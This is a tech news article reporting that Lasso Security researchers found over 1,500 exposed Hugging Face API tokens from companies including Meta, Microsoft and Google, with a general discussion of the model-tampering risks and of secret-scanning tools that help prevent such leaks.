3 min

Exposed API tokens from Meta, Microsoft, Google, and VMware, among others, were found on Hugging Face. The leak gave hackers access to hundreds of corporate accounts, but the impact could carry into the millions of users.

More than 1,500 API tokens could be viewed on Hugging Face. That poses a threat to at least 723 corporate accounts. So says an analysis by researchers at Lasso Security.

Major dangers

The exposure poses potentially significant dangers to several organizations and the users of those organizations’ tools. Moreover, among the organizations at risk are big names such as Meta, Microsoft, Google and VMware.

The danger stems from the rights the API tokens provide to attackers. For example, with 655 accounts, it would be possible to modify files because the API gives the attacker the ability to make edits. According to the researchers, it would give the ability to modify LLMs and, for example, infect them with exploits by tampering with the model’s training data. In addition, it is possible to delete data, which could cause the LLM’s answer to become incomplete because it no longer has all the information about a topic.

The API tokens allowed the attackers to perform these things on Llama 2. Llama 2 counts as a so-called “foundation model,” which, unlike GPT-4, for example, still explicitly requires additional training. Here, users can fall back on a model that has already been partially trained by at least 7 billion parameters. The AI model is a product of Meta and operates completely open source, making it findable on the Hugging Face platform.

Bigger than Llama 2

The implications are not limited only to Llama 2. The researchers were able to access 14 different datasets. Downloads of these datasets ran into the tens of thousands per month and had already been downloaded by more than one million users. So these public models, through unsecured API tokens, quickly provoke a domino effect, where tampering with the source code of one LLM quickly impacts large numbers of users. With private models, the impact may remain more limited, but that does not make the risks any less significant. The researchers were able to gain access to 10,000 private models.

“The gravity of the situation cannot be overemphasized. Now that we have control over an organization that has millions of downloads, we have the ability to manipulate existing models and potentially turn them into malicious things. This implies a serious threat, as the injection of corrupt models could affect millions of users who depend on these fundamental models for their applications,” said Bar Lanyado, a security researcher at Lasso Security.

Tool as solution

Although the researchers appear to have gotten to the leaks in time for this case, the analysis touts the need for proper API security for LLMs. Tampering with an LLM’s training data can lead to an AI application that sells falsehoods like hotcakes. That will cause major problems if users factor these untruths into their output or decisions.

Opened API tokens are the result of human error. It often occurs after a developer forgets to set invisible tokens when a code is brought to a public repository. It is often a matter of using a tool to keep such things from being forgotten. For example, GitHub has the Secret Scanning tool, and Hugging Face also allows you to send a notification when API tokens are in danger of being exposed.

Hugging Face’s CEO, Clement Delangue, also sent in a statement to The Register that the platform will take more measures to better prevent such leaks in the future. “We are also working with external platforms such as GitHub to prevent valid tokens from being published in public repositories.”

Also read: OWASP lists the 10 biggest API dangers, help is on the way